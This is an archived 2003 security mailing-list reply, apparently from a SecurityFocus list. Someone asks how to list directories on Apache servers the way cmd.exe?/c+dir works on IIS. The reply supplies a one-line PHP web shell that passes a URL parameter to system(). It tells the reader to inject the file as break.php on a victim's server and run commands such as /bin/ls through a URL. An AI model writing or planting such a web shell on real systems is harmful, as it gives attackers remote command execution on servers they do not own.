|
|||||||||||
|
RE: Directory listing
From: Maher Odeh <rax(at)netvision.net.il>
Date: Sun May 11 2003 - 05:33:24 EDT
Ex : <? php
system($arg);
after you inject this file, lets say you called it break.php do the following : "http://www.victim.com/break.php?arg=/bin/ls" you will get the directories and files etc ...
-----Original Message-----
Hi, In IIS/4 or 5 you can use the cmd.exe?/c+dir to get the directory of a machine how can the same be accomplish on other types of web server like Apache ? Can this be accomplished with a cgi or perl script ? Thanks John Do you Yahoo!? The New Yahoo! Search - Faster. Easier. Bingo. http://search.yahoo.com Did you know that you have VNC running on your network? Your hacker does. Plug your security holes. Download a free 15-day trial of VAM: http://www.securityfocus.com/StillSecure-pen-test Did you know that you have VNC running on your network? Your hacker does. Plug your security holes. Download a free 15-day trial of VAM: http://www.securityfocus.com/StillSecure-pen-test Received on Sun May 11 13:16:10 2003 This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:35 EDT |
||||||||||
|
|||||||||||